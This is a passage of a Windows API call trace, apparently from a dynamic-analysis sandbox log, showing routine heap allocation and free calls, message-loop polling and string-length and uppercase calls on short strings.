HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5a8 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e130 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72588 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee770 | out: hHeap=0x2af0000) returned 1 [0083.963] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72598 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee620 | out: hHeap=0x2af0000) returned 1 [0083.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee608 | out: hHeap=0x2af0000) returned 1 [0083.963] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.963] lstrlenW (lpString="20") returned 2 [0083.963] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.963] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.963] lstrlenW (lpString="31") returned 2 [0083.963] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.963] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] lstrlenW (lpString="20") returned 2 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] lstrlenW (lpString="20") returned 2 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] lstrlenW (lpString="31") returned 2 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] lstrlenW (lpString="20") returned 2 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] lstrlenW (lpString="20") returned 2 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] lstrlenW (lpString="31") returned 2 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.964] lstrlenW (lpString="36") returned 2 [0083.965] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.965] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.965] lstrlenW (lpString="20") returned 2 [0083.965] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.965] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.980] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.988] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.988] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.988] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.988] lstrlenW (lpString="20") returned 2 [0083.988] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.988] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.988] lstrlenW (lpString="32") returned 2 [0083.988] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.988] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.993] lstrlenW (lpString="20") returned 2 [0083.993] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.994] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.994] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.994] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.994] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.994] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.999] lstrlenW (lpString="20") returned 2 [0083.999] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.999] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.999] lstrlenW (lpString="31") returned 2 [0083.999] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.999] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.999] lstrlenW (lpString="20") returned 2 [0083.999] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.999] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.000] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.000] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.000] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.000] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.000] lstrlenW (lpString="20") returned 2 [0084.000] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.000] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.005] lstrlenW (lpString="32") returned 2 [0084.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0084.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef520 [0084.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724d8 [0084.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef460 | out: hHeap=0x2af0000) returned 1 [0084.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef658 | out: hHeap=0x2af0000) returned 1 [0084.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72438 | out: hHeap=0x2af0000) returned 1 [0084.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef520 | out: hHeap=0x2af0000) returned 1 [0084.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724d8 | out: hHeap=0x2af0000) returned 1 [0084.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef670 | out: hHeap=0x2af0000) returned 1 [0084.009] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.009] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723b8 [0084.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef460 [0084.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0084.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723c8 [0084.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef520 [0084.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef658 [0084.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72408 [0084.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef790 [0084.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef868 [0084.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723d8 [0084.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef910 [0084.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723d8 | out: hHeap=0x2af0000) returned 1 [0084.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef928 [0084.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723d8 [0084.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723d8 | out: hHeap=0x2af0000) returned 1 [0084.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0084.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723d8 [0084.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723d8 | out: hHeap=0x2af0000) returned 1 [0084.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7c0 [0084.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724d8 [0084.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef970 [0084.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef910 | out: hHeap=0x2af0000) returned 1 [0084.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef868 | out: hHeap=0x2af0000) returned 1 [0084.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef928 | out: hHeap=0x2af0000) returned 1 [0084.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0084.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef790 | out: hHeap=0x2af0000) returned 1 [0084.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72408 | out: hHeap=0x2af0000) returned 1 [0084.015] lstrlenW (lpString="36") returned 2 [0084.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7c0 | out: hHeap=0x2af0000) returned 1 [0084.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724d8 | out: hHeap=0x2af0000) returned 1 [0084.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef970 | out: hHeap=0x2af0000) returned 1 [0084.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef658 | out: hHeap=0x2af0000) returned 1 [0084.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef520 | out: hHeap=0x2af0000) returned 1 [0084.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723c8 | out: hHeap=0x2af0000) returned 1 [0084.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef520 [0084.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef658 [0084.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724d8 [0084.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef670 | out: hHeap=0x2af0000) returned 1 [0084.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef460 | out: hHeap=0x2af0000) returned 1 [0084.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723b8 | out: hHeap=0x2af0000) returned 1 [0084.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef658 | out: hHeap=0x2af0000) returned 1 [0084.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724d8 | out: hHeap=0x2af0000) returned 1 [0084.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef520 | out: hHeap=0x2af0000) returned 1 [0084.019] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.019] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723b8 [0084.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef658 [0084.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef460 [0084.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724d8 [0084.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef520 [0084.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0084.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72428 [0084.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef700 [0084.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef790 [0084.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723c8 [0084.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef730 [0084.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723c8 | out: hHeap=0x2af0000) returned 1 [0084.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7c0 [0084.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723c8 [0084.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723c8 | out: hHeap=0x2af0000) returned 1 [0084.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef868 [0084.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72438 [0084.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72438 | out: hHeap=0x2af0000) returned 1 [0084.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef910 [0084.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72408 [0084.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef928 [0084.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef730 | out: hHeap=0x2af0000) returned 1 [0084.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef790 | out: hHeap=0x2af0000) returned 1 [0084.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7c0 | out: hHeap=0x2af0000) returned 1 [0084.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef868 | out: hHeap=0x2af0000) returned 1 [0084.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef700 | out: hHeap=0x2af0000) returned 1 [0084.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72428 | out: hHeap=0x2af0000) returned 1 [0084.031] lstrlenW (lpString="20") returned 2 [0084.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef910 | out: hHeap=0x2af0000) returned 1 [0084.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72408 | out: hHeap=0x2af0000) returned 1 [0084.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef928 | out: hHeap=0x2af0000) returned 1 [0084.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef670 | out: hHeap=0x2af0000) returned 1 [0084.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef520 | out: hHeap=0x2af0000) returned 1 [0084.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724d8 | out: hHeap=0x2af0000) returned 1 [0084.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef520 [0084.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0084.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a723c8 [0084.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef460 | out: hHeap=0x2af0000) returned 1 [0084.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef658 | out: hHeap=0x2af0000) returned 1 [0084.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723b8 | out: hHeap=0x2af0000) returned 1 [0084.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef670 | out: hHeap=0x2af0000) returned 1 [0084.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723c8 | out: hHeap=0x2af0000) returned 1 [0084.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef520 | out: hHeap=0x2af0000) returned 1 [0084.038] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0084.043] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724d8 [0084.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef658 [0084.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724d8 | out: hHeap=0x2af0000) returned 1 [0084.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef460 [0084.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef658 | out: hHeap=0x2af0000) returned 1 [0084.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef658 [0084.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef460 | out: hHeap=0x2af0000) returned 1 [0084.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0084.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef508 | out: hHeap=0x2af0000) returned 1 [0084.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef280 | out: hHeap=0x2af0000) returned 1 [0084.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e2c0 | out: hHeap=0x2af0000) returned 1 [0084.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72598 | out: hHeap=0x2af0000) returned 1 [0084.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e478 | out: hHeap=0x2af0000) returned 1 [0084.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef430 | out: hHeap=0x2af0000) returned 1 [0084.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef628 | out: hHeap=0x2af0000) returned 1 [0084.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723a8 | out: hHeap=0x2af0000) returned 1 [0084.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e220 | out: hHeap=0x2af0000) returned 1 [0084.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef5f8 | out: hHeap=0x2af0000) returned 1 [0084.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef5c8 | out: hHeap=0x2af0000) returned 1 [0084.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e3d8 | out: hHeap=0x2af0000) returned 1 [0084.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0084.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e4c8 | out: hHeap=0x2af0000) returned 1 [0084.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef220 | out: hHeap=0x2af0000) returned 1 [0084.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72478 | out: hHeap=0x2af0000) returned 1 [0084.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef160 | out: hHeap=0x2af0000) returned 1 [0084.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef1c0 | out: hHeap=0x2af0000) returned 1 [0084.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef190 | out: hHeap=0x2af0000) returned 1 [0084.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef370 | out: hHeap=0x2af0000) returned 1 [0084.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72518 | out: hHeap=0x2af0000) returned 1 [0084.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef310 | out: hHeap=0x2af0000) returned 1 [0084.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0084.051] 